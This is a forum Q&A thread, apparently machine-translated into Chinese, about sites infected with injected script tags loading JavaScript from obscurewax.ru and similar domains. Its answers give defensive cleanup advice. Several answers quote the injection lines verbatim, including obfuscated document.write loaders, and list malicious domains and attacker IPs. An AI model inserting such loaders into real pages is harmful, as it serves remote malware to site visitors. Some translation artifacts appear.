Question

我将以下代码自动添加到我的脚本中......

<script type="text/javascript" src="http://obscurewax.ru/Kilobyte.js"></script> 
<!--72628eb2e686638651ad69b6a34a630f-->

在我的每个页面的末尾，当我看到我的页面的源代码时，它向我显示上面的代码，但当我在记事本或任何编辑软件中打开该文件时，它只显示我的脚本..我怎么能删除我的所有文件中的那个脚本一次......

也让我知道为什么到目前为止......

Answer 1

编辑8月25日：
特定领域＆amp;添加的条目（下）
新域名nuttypiano.com发现。

编辑：
弄清楚了。这肯定是Filezilla虹吸我的FTP密码密切关注.htaccess文件和文件权限 - 它们似乎更改为777。

也发生在我身上。它从FTP程序中获取了所有密码，然后更改了PHP和js文件以添加行

＆lt; script type =“text / javascript”src =“http://obscurewax.ru/ Queue.js ”＆gt;

主要是索引。*文件的目标是其他目标文件是* .js文件。

我认为结束js文件名有所不同，但您可以从obscurewax.ru域中跟踪它。

我发现了大约8-10个网站。我的大多数网站都在运行joomla。在我所观察到的内容中，它喜欢定位以单词开头的文件指数。

在joomla安装中，大约有122个受此影响的文件，几乎所有文件都在： joomla_install / administrator
文件夹中。

从服务器下载joomla安装很痛苦，因为它大约有4-5千个文件。不过，我所遵循的策略是这样的。

在文件夹上下载整个网站，运行文本搜索（我正在使用TextCrawler）： obscurewax.ru

请注意具有此功能的文件和文件夹的数量，更重要的是请注意js文件名的所有变体。

搜索并替换所有.js文件变体，例如：

＆lt; script type =“text / javascript”src =“http://obscurewax.ru/Queue.js”＆gt;
  ＆lt; script type =“text / javascript”src =“http://obscurewax.ru/Cablemodem.js”＆gt;
  ＆lt; script type =“text / javascript”src =“http://obscurewax.ru/Kilobyte.js”＆gt;

在.js文件中，您还可以找到这种类型的代码：

document.write('<s'+'cript type="text/javascript" 
src="http://obscurewax.ru/AGP.js"></scr'+'ipt>'); // Found in .js files

全部替换（''）你可以做的另一件事是：使用example.com的obscurewax.ru

我没有快速简便的方法来删除它下面的评论中的代码（我认为它们用于跟踪目的。） - 但我认为如果删除脚本链接，该评论不是要伤害你

发现不同的域名：

nuttypiano.com （8月25日发现）

pocketbloke.ru

yumeye.ru

microlightning.ru

riotassistance.ru

// Denis125＆lt; webmaster@atlant.ru> （在.js档案中发表评论。）

需要注意的具体行：

<script type="text/javascript" src="http://obscurewax.ru/Beta_Software.js"></script>
<script type="text/javascript" src="http://riotassistance.ru/Undo.js"></script>
* Contributed by Open Web Technologies <http://openwebtech.ru/>
Denis125 <webmaster@atlant.ru>
// Author: Andrei Blagorazumov, a@fnr.ru
document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/Undo.js"></scri'+'pt>');
document.write('<s'+'cript type="text/javascript" src="http://obscurewax.ru/Beta_Software.js"></scr'+'ipt>');
<script type="text/javascript" src="http://nuttypiano.com/Hard_Copy.js"></script>
<script type="text/javascript" src="http://nuttypiano.com/Facebook.js"></script>
document.write('<s'+'cript type="text/javascript" src="http://nuttypiano.com/Facebook.js"></scri'+'pt>');

注意：有时您将无法在源代码中的html中看到此链接，但是文件会被加载，因为它隐藏在其中一个JavaScripts中。确保您非常干净的一个好方法是实际进入并查看在加载页面时加载的.js文件，并检查是否有任何.js文件从可疑域加载。一个简单的方法是进入chrome中的开发人员工具（ctrl + shift + i）在资源选项卡中，您将看到脚本过滤器，使用此过滤器可以跟踪页面加载时加载的所有.js文件。 firefox中的firebug插件也会让你看到这个信息。如果您的网站有多个部分（前端，后端），您想访问网站的所有部分，并检查是否有任何可疑的.js文件被加载。

非常重要

更新您的防病毒扫描程序，并在计算机上执行完整扫描以查找病毒。

如果您使用的是FTP程序，或者您的代码编辑器具有FTP功能，您希望访问存储了密码的所有网站，并检查它们是否受到影响。如果您的FTP程序/编辑器遭到入侵 - 几乎所有存储了ftp密码的网站都会受到影响。

更改程序中存储的所有ftp帐户的密码。

卸载可疑程序＆amp;使用另一个或重新下载并安装它。

这是Web开发人员可能遇到的最糟糕的事情。这种攻击通常是通过诱骗受害者（您和我）相信程序中的FTP程序有更新来完成，只要您安装更新 - 您的网站就会受到影响。

我正在研究这件事。如果你有更好/更短的方法这样做。请分享。谢谢！

Answer 2

我有一个客户端网站被来自obscurewax.ru的代码行攻击。该网站托管在GoDaddy共享主机上。看起来他们昨天在服务器上编辑了多个文件。

我们不确定他们是如何进入网站的，但他们确实让网站崩溃了。我们现在正在进入并删除所有内容，因为我们不确定他们将文件重新开始的位置。

他们离开了这行代码 - obscurewax.ru/Heat_Sink.js

哪个什么都没做，但我没有抓住任何机会。根据whois，域名是在三天前购买的，而且信息是私密的。如果它是托管服务提供商，它将是公开的。它被托管在俄罗斯和美国网站上，我认为这是一面红旗。我认为他们正在构建他们的网络，并且一旦他们有足够大的足迹就会激活脚本。

希望有所帮助。

Answer 3

您的托管服务提供商是谁？有些主机会在您的网页上即时插入代码（通常是免费网站的广告横幅，但并非总是如此）。如果您确实有这样的主持人，我建议您选择另一个主持人。

永远不要归因于免费虚拟主机可能导致的病毒;）
这实际上是您网页中插入的脚本的网址吗？因为那是一个空文件。

Answer 4

嗯..似乎是0月的proftpd。一对客户在他们的网站上报告了这个问题。服务器上安装了proftpd 1.3.1。关于日志文件，攻击者只强制登录名，而不是密码。在成功猜出登录名（例如关于网站的域名）之后，他们没有任何登录问题...... 不好的，我希望升级到1.3.3会解决它。

如果你正在运行linux服务器，那么在obscurewax攻击之后有2个快速控制台片段来修复站点：

    cd /to/site/webroot
find ./ -type f -exec sed -i "s/document.write('<s'+'cript type=\"text\/javascript\" src=\"http:\/\/obscurewax.ru\/Google.js\"><\/scr'+'ipt>')//g" {} \
find ./ -type f -exec sed -i 's/<script type="text\/javascript" src="http:\/\/obscurewax.ru\/Google.js"><\/script>//g' {} \;

不要忘记将Google.js替换为您的攻击者链接。

<强>更新

proftpd很干净。经过一番调查后，我发现了真正的原因，这只是平淡无奇的。其中一位主要的托管经理是将许多ftp用户的登录名/密码保存在Windows桌面上的Filezilla中。他保存的所有密码都被第三方窃取。

Answer 5

我在网站上遇到了同样的问题。他们改变了所有.js文件并在最后添加了这行代码。问题是我无法找到他们是如何做到的。

Answer 6

这可能是任何未更新的组件/插件吗？我们如何制作一个组件列表，看看我们是否有一些相同的东西，也许是这个黑客的诅咒？

我的清单是:(组件）附件
横幅启用1.5.0 2006年4月Joomla！项目
CSV改进已启用1.7 2009年5月22日RolandD Cyber Produksi
CSVI VirtueMart Enabled 2.0.1 2009年11月28日RolandD Cyber Produksi
docman启用1.4.0.stable 2009年2月Joomlatools
轻松搜索启用0.1.0 2008年11月Hiro Nozu
easysql已启用1.27 30/11/2006 Serebro
FrontpagePlus已禁用0.1.0 2009年1月NoNumber！（Peter van Westen）
gk3_tabs_manager已禁用3.0.2 31/05/2009 Gavick.com
JCE已启用157 2009年6月23日Ryan Demmer
JCrawler启用1.7 Beta 20/4/2009 Patrick Winkler
JoomlaPack启用2.4 2009-12-05 JoomlaPack开发人员
K2启用2.1 2009年9月9日JoomlaWorks
Linkr启用2.3.6 2008年4月Frank
新闻节目启用1.5.0 2006年4月Joomla！项目
投票启用1.5.0 2004年7月Joomla！项目
Nova Enabled 1.7.5 2010年2月ProJoom
pjinstaller启用1.0.8 2010年1月ProJoom
QContacts禁用1.0.3 2008年7月Massimo Giagnoni
QuickFAQ Enabled 1.0.3 01/02/2009 Christoph Lukes
redlinker已启用1.0b11 09/09/2009 Redweb.dk
redVMPRODUCTFINDER已启用1.10 21/01/2010 Redweb.dk
RokCandy已禁用0.82a 2009年1月31日RocketWerx，LLC RokModule启用2008年6月1日RocketTheme
forme Enabled 1.0.4 07/02/2008 www.rsjoomla.com
RSform Enabled 1.2.0 17/06/2009 www.rsjoomla.com
rsinstaller已启用1.0.0 04/06/2009 www.rsjoomla.com
sh404sef启用1.0.16_Beta 2009年1月2日Yannick Gaultier
VirtueMart启用1.1.4 16.10.2009 VirtueMart开发团队
vmemails已启用1.0.4b182 2009-11-28 InteraMind Advanced Analytics
Weblinks启用1.5.0 2006年4月Joomla！项目
XMAP

注意：2个月前我对我的电脑进行了彻底的清理，更改了服务器和网站上的所有密码。这只能在病毒恢复之前发挥作用，所以我非常好的猜测是它是一个在损坏期间的组件，模块，插件。是的，你可以做你想要的所有病毒清理，但问题会回来！

Answer 7

我偶然发现了这个;哎呀，这是最近发生的一件事。我以为我的网站是唯一的网站。我注意到每当我访问我的网站时，这个脚本总是加载;我正在运行CMS，但现在我关闭了它。至于FTP中的漏洞的建议，由于我从未使用过FTP，因此请将我排除在外。我只是关闭了CMS部分，因为即使在运行CMS的最新版本的全新安装之后，在访问该站点时仍然会加载另一个恶意脚本。这让我得出结论，我的网站主机的服务器可能已经被破坏了。其他攻击我的CMS的恶意脚本包括：

的 pocketbloke.ru

yumeye.ru，

的 microlightning.ru

P.S：我的.htaccess文件也被更改，我的CMS的文件权限全部转为777.这可能是这些黑客利用的cPanel漏洞吗？

Answer 8

从更改FTP或任何其他远程访问密码开始，并检查您的计算机/服务器是否有病毒。某事/有人会自动将其添加到您的所有文件中。然后，您可以使用任何批量文本替换工具（如http://tools.tortoisesvn.net/grepWin）在所有文件中找到该行并将其删除（通过替换为空行）。

<强>更新

我错过了关于您在文件来源中没有看到该行的问题。只需检查文件的其余部分并检查所有JS文件 - 它们应该包含一小部分缩小的代码，这些代码会添加该行。您还可以尝试在本地搜索所有文件，或使用任何浏览器开发人员工具查找相同的URL或部分内容。

Answer 9

怪异。我在我的一个客户index.html中得到了同样的东西，带有一堆其他神秘文件。也许他们进入了他的FTP。在我的其他50个客户中，似乎没有人受到影响。

经过检查，随机用户已经能够访问FTP一段时间了。这里是我知道不是所有者的唯一IP列表

137.149.150.100
173.35.246.173
174.143.242.47
188.229.31.45
188.24.43.62
188.25.239.153
188.25.73.186
189.28.154.133
198.145.116.71
198.63.210.170
203.81.55.153
208.101.102.60
209.239.120.50
212.189.180.1
213.142.137.131
217.27.224.7
68.45.8.194
69.143.233.198
70.38.11.176
70.81.249.108
74.58.67.48
76.104.123.11
78.159.45.198
78.245.136.34
78.251.215.23
78.94.44.177
79.112.216.109
79.114.26.35
79.117.237.130
79.136.32.209
81.66.237.244
81.82.154.174
81.82.52.12
82.234.154.97
82.247.130.26
82.36.17.105
83.84.225.144
84.196.204.172
85.136.145.183
85.139.199.26
85.28.76.190
86.60.215.133
87.244.217.188
87.247.251.44
87.59.67.145
88.162.127.32
88.207.7.151
89.114.92.59
89.46.96.87
89.47.179.66
91.147.207.215
91.65.157.38
92.249.196.99
94.141.145.147
94.227.112.143
95.79.22.165
99.226.133.161

看起来像某种大规模攻击。我会查看修改过的文件的时间戳，看看是否有任何关闭或者你的其他任何ftp用户是否登录了这些IP。请注意我正在使用proftpd运行debian linux服务器......

尝试使用notepad2在winSCP中编辑文件时出现了一个奇怪的错误消息...所以它看起来像是什么代码，弄乱了典型的文本编辑器。我能够纳米文件并删除链接。

PS：当谷歌通过电子邮件发送给我“亲爱的网站所有者或[审查] .com网站管理员时，我意识到了这一点，我们最近发现，您的某些网页可能会导致用户感染恶意软件。我们已开始向通过点击Google.com上的搜索结果访问这些网页的用户显示警告页。“

Answer 10

今天检测到同样的问题。我手动删除了js中的所有字符串。他们越来越聪明。我的字符串是：

document.write('<s'+'cript type="text/javascript" src="http://obscurewax.ru/Scroll_Wheel.js"></scr'+'ipt>');

Answer 11

恶意软件使用存储的ftp密码感染PC。然后它会自动获取密码并登录并感染网站。在c：\ windows \ system32 \ drivers中查找最近修改的2个文件他们可能是罪魁祸首。

Answer 12

以下是Google在我的网站上找到的脚本。由于“恶意软件”，谷歌阻止了我的网站

我正在尝试“Word Press”和一个主题，我支付了“The Local”。在我看来，这是可以添加此脚本的唯一途径。我删除了Word Press和The Local的所有脚本，现在Google没有检测到我网站上的恶意软件。

我的解决方案是删除我提到的所有脚本，并用标准HTML替换所有脚本。其他脚本大多都是PHP，我发现HTML更加稳定。

祝你好运

如何从脚本中删除脚本病毒

12 个答案: